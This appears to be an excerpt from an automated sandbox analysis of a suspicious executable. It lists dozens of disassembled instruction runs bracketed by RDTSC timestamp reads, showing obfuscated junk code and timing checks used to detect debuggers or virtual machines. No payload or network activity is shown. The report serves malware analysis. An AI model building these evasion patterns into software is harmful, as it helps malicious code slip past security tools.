                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A920A second address: 12A92CC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F15490E9B99h 0x0000000e nop 0x0000000f mov ecx, dword ptr [ebp+122D2C5Dh] 0x00000015 jne 00007F15490E9B8Ch 0x0000001b push 00000000h 0x0000001d push E5C7AD44h 0x00000022 jmp 00007F15490E9B8Ch 0x00000027 add dword ptr [esp], 1A38533Ch 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007F15490E9B88h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 push 00000003h 0x0000004a call 00007F15490E9B98h 0x0000004f movzx edx, si 0x00000052 pop edi 0x00000053 push 00000000h 0x00000055 add edi, 24DD6AEFh 0x0000005b push 00000003h 0x0000005d jmp 00007F15490E9B94h 0x00000062 push 97BEE970h 0x00000067 push eax 0x00000068 push edx 0x00000069 jbe 00007F15490E9B8Ch 0x0000006f jc 00007F15490E9B86h 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A92CC second address: 12A92D1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A9462 second address: 12A9468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A9468 second address: 12A946D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A946D second address: 12A9472 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A9522 second address: 12A9527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A9527 second address: 12A95B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15490E9B95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 06F38B7Ah 0x00000010 push 00000003h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F15490E9B88h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c mov ch, dh 0x0000002e mov ch, 09h 0x00000030 push 00000000h 0x00000032 mov esi, dword ptr [ebp+122D2C05h] 0x00000038 push 00000003h 0x0000003a add dword ptr [ebp+122D282Dh], edi 0x00000040 push BC9FD905h 0x00000045 pushad 0x00000046 push eax 0x00000047 pushad 0x00000048 popad 0x00000049 pop eax 0x0000004a push eax 0x0000004b push esi 0x0000004c pop esi 0x0000004d pop eax 0x0000004e popad 0x0000004f xor dword ptr [esp], 7C9FD905h 0x00000056 mov dword ptr [ebp+122D20CBh], ebx 0x0000005c lea ebx, dword ptr [ebp+1245B0C8h] 0x00000062 mov ch, bh 0x00000064 xchg eax, ebx 0x00000065 push ebx 0x00000066 jmp 00007F15490E9B8Bh 0x0000006b pop ebx 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f jng 00007F15490E9B88h 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A95B8 second address: 12A95BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CA254 second address: 12CA25A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CA25A second address: 12CA297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jbe 00007F1548D0B2F6h 0x0000000e jns 00007F1548D0B2F6h 0x00000014 jmp 00007F1548D0B2FDh 0x00000019 popad 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F1548D0B2FFh 0x00000022 pushad 0x00000023 jl 00007F1548D0B2F6h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CA297 second address: 12CA29C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CA29C second address: 12CA2A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CA582 second address: 12CA588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CA588 second address: 12CA58C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CA58C second address: 12CA592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CA592 second address: 12CA5B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F1548D0B304h 0x0000000c pop eax 0x0000000d je 00007F1548D0B2FEh 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CADEF second address: 12CADF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB0BB second address: 12CB0BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB0BF second address: 12CB0C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB475 second address: 12CB479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB479 second address: 12CB483 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F15490E9B86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB483 second address: 12CB4B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1548D0B301h 0x00000008 jmp 00007F1548D0B2FFh 0x0000000d jc 00007F1548D0B2F6h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB4B5 second address: 12CB4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB4B9 second address: 12CB509 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1548D0B308h 0x00000007 jmp 00007F1548D0B305h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jnc 00007F1548D0B2F6h 0x00000015 jmp 00007F1548D0B307h 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB509 second address: 12CB510 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CBDA8 second address: 12CBDAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CBF06 second address: 12CBF0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CE8E4 second address: 12CE8E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CE8E8 second address: 12CE8F6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F15490E9B86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CE8F6 second address: 12CE8FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CF18E second address: 12CF193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D2AFD second address: 12D2B31 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F1548D0B305h 0x00000008 jmp 00007F1548D0B308h 0x0000000d pop ecx 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12992B8 second address: 12992BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA48D second address: 12DA499 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA499 second address: 12DA49F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA49F second address: 12DA4A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA4A9 second address: 12DA4B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F15490E9B86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA4B3 second address: 12DA4B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA4B7 second address: 12DA4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DB3E6 second address: 12DB3F4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1548D0B2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DB3F4 second address: 12DB3F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DB486 second address: 12DB4C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1548D0B302h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 4B326C9Eh 0x00000010 call 00007F1548D0B302h 0x00000015 pop edi 0x00000016 push B893E400h 0x0000001b push eax 0x0000001c push edx 0x0000001d jne 00007F1548D0B2F8h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DB76F second address: 12DB779 instructions: 0x00000000 rdtsc 0x00000002 je 00007F15490E9B86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DB91B second address: 12DB937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1548D0B308h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DB937 second address: 12DB955 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15490E9B93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DBB18 second address: 12DBB1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DBB1D second address: 12DBB22 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC06A second address: 12DC06E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC2EA second address: 12DC2EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC566 second address: 12DC56A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC56A second address: 12DC57A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15490E9B8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC57A second address: 12DC58B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1548D0B2F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC67C second address: 12DC697 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F15490E9B88h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, dword ptr [ebp+12476244h] 0x00000015 xchg eax, ebx 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC697 second address: 12DC69B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC69B second address: 12DC6BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F15490E9B97h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DE7F2 second address: 12DE800 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DD557 second address: 12DD56C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F15490E9B91h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DE800 second address: 12DE80A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1548D0B2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DF3FB second address: 12DF405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F15490E9B86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DF405 second address: 12DF409 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DF409 second address: 12DF418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DF418 second address: 12DF4A6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1548D0B2F8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F1548D0B2F8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov esi, dword ptr [ebp+122D29CDh] 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007F1548D0B2F8h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 0000001Bh 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 mov dword ptr [ebp+122D3071h], edx 0x0000004f push 00000000h 0x00000051 push 00000000h 0x00000053 push eax 0x00000054 call 00007F1548D0B2F8h 0x00000059 pop eax 0x0000005a mov dword ptr [esp+04h], eax 0x0000005e add dword ptr [esp+04h], 00000014h 0x00000066 inc eax 0x00000067 push eax 0x00000068 ret 0x00000069 pop eax 0x0000006a ret 0x0000006b sub esi, dword ptr [ebp+122D1BA8h] 0x00000071 xchg eax, ebx 0x00000072 push eax 0x00000073 push edx 0x00000074 js 00007F1548D0B2FCh 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DF4A6 second address: 12DF4AB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFE60 second address: 12DFEC6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1548D0B2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov dword ptr [esp], eax 0x0000000e and edi, 64F61312h 0x00000014 push 00000000h 0x00000016 and edi, 2F45FF1Bh 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebp 0x00000021 call 00007F1548D0B2F8h 0x00000026 pop ebp 0x00000027 mov dword ptr [esp+04h], ebp 0x0000002b add dword ptr [esp+04h], 00000018h 0x00000033 inc ebp 0x00000034 push ebp 0x00000035 ret 0x00000036 pop ebp 0x00000037 ret 0x00000038 jmp 00007F1548D0B307h 0x0000003d mov esi, 64865E12h 0x00000042 xor dword ptr [ebp+122D28E9h], ecx 0x00000048 push eax 0x00000049 push ecx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFEC6 second address: 12DFECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E14B9 second address: 12E14BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E14BE second address: 12E1539 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnl 00007F15490E9B86h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F15490E9B88h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov esi, dword ptr [ebp+122D287Dh] 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edi 0x00000032 call 00007F15490E9B88h 0x00000037 pop edi 0x00000038 mov dword ptr [esp+04h], edi 0x0000003c add dword ptr [esp+04h], 00000014h 0x00000044 inc edi 0x00000045 push edi 0x00000046 ret 0x00000047 pop edi 0x00000048 ret 0x00000049 pushad 0x0000004a mov bh, 6Fh 0x0000004c mov dword ptr [ebp+122D333Fh], esi 0x00000052 popad 0x00000053 mov edi, ecx 0x00000055 push 00000000h 0x00000057 sub edi, dword ptr [ebp+1245BF52h] 0x0000005d jmp 00007F15490E9B8Eh 0x00000062 xchg eax, ebx 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 jp 00007F15490E9B86h 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E1539 second address: 12E1543 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E1543 second address: 12E1571 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F15490E9B86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jne 00007F15490E9B88h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F15490E9B97h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E3ECA second address: 12E3ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E3ECF second address: 12E3EF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F15490E9B8Fh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push esi 0x0000000c jns 00007F15490E9B86h 0x00000012 pushad 0x00000013 popad 0x00000014 pop esi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b pop eax 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E552C second address: 12E5556 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1548D0B305h 0x00000007 jl 00007F1548D0B2FCh 0x0000000d jc 00007F1548D0B2F6h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E5556 second address: 12E555C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E1DD4 second address: 12E1DDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E555C second address: 12E556C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F15490E9B8Bh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E556C second address: 12E5571 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E5571 second address: 12E557F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F15490E9B86h 0x0000000a pop edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12927AF second address: 12927B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12927B5 second address: 12927D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F15490E9B94h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12927D0 second address: 12927D5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12927D5 second address: 12927DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12927DE second address: 12927E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12927E4 second address: 12927E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E7A4C second address: 12E7A76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1548D0B309h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007F1548D0B2F6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8010 second address: 12E8014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8014 second address: 12E801E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1548D0B2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
